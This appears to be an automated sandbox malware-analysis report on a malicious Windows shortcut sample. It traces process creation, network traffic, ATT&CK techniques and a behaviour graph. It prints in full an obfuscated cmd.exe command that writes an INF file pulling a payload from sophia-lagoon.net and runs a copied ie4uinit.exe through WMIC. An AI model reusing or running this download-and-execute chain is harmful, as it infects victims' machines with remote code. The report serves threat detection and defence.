Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: global traffic HTTP traffic detected:
    GET /81754783 HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: sophia-lagoon.net
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783
Source: ie4uinit.exe, 00000013.00000003.1525429471.000002474C031000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C033000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783WWC:
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474C003000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sophia-lagoon.net/81754783lP
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe, 00000013.00000002.1582941785.000002474C01E000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1580755717.000002474C01A000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000003.1525429471.000002474C00E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: unknown DNS traffic detected: queries for: sophia-lagoon.net
Source: global traffic HTTP traffic detected:
    GET /81754783 HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: sophia-lagoon.net
    Connection: Keep-Alive

System Summary

Source: unknown Process created: Commandline size = 2790
Source: WMIC.exe, 00000011.00000002.1515062774.000001AF64030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Default
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File deleted: C:\Windows\Temp\OLDF396.tmp
Source: C:\Windows\System32\xcopy.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" 
| set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe "C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_02
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\microsoft\ieuinit.inf
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File created: C:\Windows\Temp\OLDF396.tmp
Source: classification engine Classification label: mal52.evad.winZIP@23/9@1/1
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-2660496737-530772487-1027249058-1002\Software\Microsoft\Office
Source: Binary string: ie4uinit.pdbGCTL source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: Binary string: ie4uinit.pdb source: xcopy.exe, 0000000E.00000002.1487250753.000002784F9CB000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000013.00000000.1501414620.00007FF63F516000.00000002.00000001.01000000.00000006.sdmp, ie4uinit.exe.14.dr
Source: ie4uinit.exe.14.dr Static PE information: section name: .didat
Source: ie4uinit.exe.14.dr Static PE information: 0xEF6764A3 [Thu Apr 11 14:56:35 2097 UTC]

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\xcopy.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeJump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ie4uinit.exe, 00000013.00000003.1580755717.000002474BFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /c set "lucky50=e" && set "lucky5=$w" && set "lucky03=version" && set "lucky10=d" && (for %u in (a) do @set "lucky87=%~u") && set "lucky41=fast" && call set "lucky59=%lucky41:~2,1%" && set "lucky85=init" && set "lucky7=t" && set "lucky26=." && set "lucky23=settings" && set "lucky55=si" && (for %q in (c) do @set "lucky29=%~q") && set "lucky65=!lucky26!inf" && set "lucky15=ieu!lucky85!!lucky65!" && call !lucky59!et "lucky11=%app!lucky10!ata%\micro!lucky59!oft\" && !lucky59!et "lucky8=!lucky11!!lucky15!" && (for %p in ("[!lucky03!]" "signature = !lucky5!indows nt$" "[!lucky10!e!lucky59!tinationdirs]" "e4139c=01" "[!lucky10!efaultin!lucky59!tall.windows7]" "unregis!lucky7!erocxs=a687d4" "!lucky10!elfil!lucky50!s=e4139c" "[a687d4]" "%11%\scro\" "%lucky51%j,ni,%lucky21%%lucky0%%lucky0%p%lucky1%%lucky9%%lucky9%sophia-lagoon!lucky26!%lucky56%/81754783" "[e4139c]" "ieu%lucky69%!lucky65!" "[!lucky59!!lucky7!rings]" "lucky69=!lucky85!" "lucky0=t;lucky40" "!lucky59!ervicen!lucky87!me=' '" "lucky21=h" "lucky1=:;lucky35" "lucky9=/" "!lucky59!hortsvcn!lucky87!me=' '" "lucky56=net" "lucky51=b;lucky67" "lucky25=%time%") do @e!lucky29!ho %~p)>"!lucky8!" && !lucky59!et "lucky2=ie4u!lucky85!.!lucky50!xe" && call xcopy /y /c /q %win!lucky10!ir%\!lucky59!ystem32\!lucky2! "!lucky11!*" | set lucky93=nation && !lucky59!t!lucky87!rt "" wmi!lucky29! proce!lucky59!s call !lucky29!rea!lucky7!e "!lucky11!!lucky2! -base!lucky23!" 
| set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set lucky28= occur elevator knock considerations teens stool rankings offices message toward reviews discusses appliances tasks scorpion situations erase shock clean vault carriers twins disease dentists seeks friends impulse vehicles stand submissions night batteries cigar junior heart habit containers cables taxes ostrich series incentives sorts erode measurements investigators styles music actress items differ suits sources archives headphones texas emotions monsters above holdings outputs characteristics forecasts readers processes plastic mosquito roses manuals representatives editors elephant recommendations roommates coral dolphin offers focuses implies ignore champions family rangers garlic blind evidence facilities products makers wives pockets solaris vibrant excess raven secrets celebs summaries inherit crawl tutorials stands upgrade crowd betray orange patient entire weather cruel wellness attention waters failures jewel buttons assume configurations levels enemy labels memories ticket honey violin primary lovers depends exceptions findings olympics cousin kinds fruits centres smart avoid mechanic gorilla swingers century figure details renew careers embody shapes antibodies motion interactions instances miles subway remain legend mounts midnight mercy filter sessions asthma shrimp greetings autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
MITRE ATT&CK Matrix (techniques listed per tactic; where the report shows a count in front of a technique it is kept as shown)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 21 Windows Management Instrumentation; 11 Command and Scripting Interpreter; 1 Scheduled Task/Job; At (Windows); Cron
Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: 1 Masquerading; 11 Process Injection; 1 Rundll32; 1 Timestomp; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 1 Security Software Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 3 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings
Behavior Graph (ID: 16737; Sample: Education and Experience.ln...; Startdate: 15/02/2023; Architecture: WINDOWS; Score: 52)

Recovered from the graph text (process tree, signatures and network/file nodes as the graph links them):

Start
    signatures: Very long command line found; Contains functionality to create processes via WMI
    started: cmd.exe 2; ie4uinit.exe 64; ie4uinit.exe; 2 other processes
cmd.exe 2
    started: cmd.exe 1; cmd.exe 1; conhost.exe 1; 2 other processes
ie4uinit.exe 64
    network: sophia-lagoon.net 142.11.222.59, 49727, 80 HOSTWINDSUS United States
    started: ie4uinit.exe 46
cmd.exe 1
    started: WMIC.exe 1
cmd.exe 1
    started: xcopy.exe 2
ie4uinit.exe 46
    started: rundll32.exe
WMIC.exe 1
    signatures: Creates processes via WMI
    started: conhost.exe
xcopy.exe 2
    dropped: C:\Users\user\AppData\...\ie4uinit.exe, PE32+
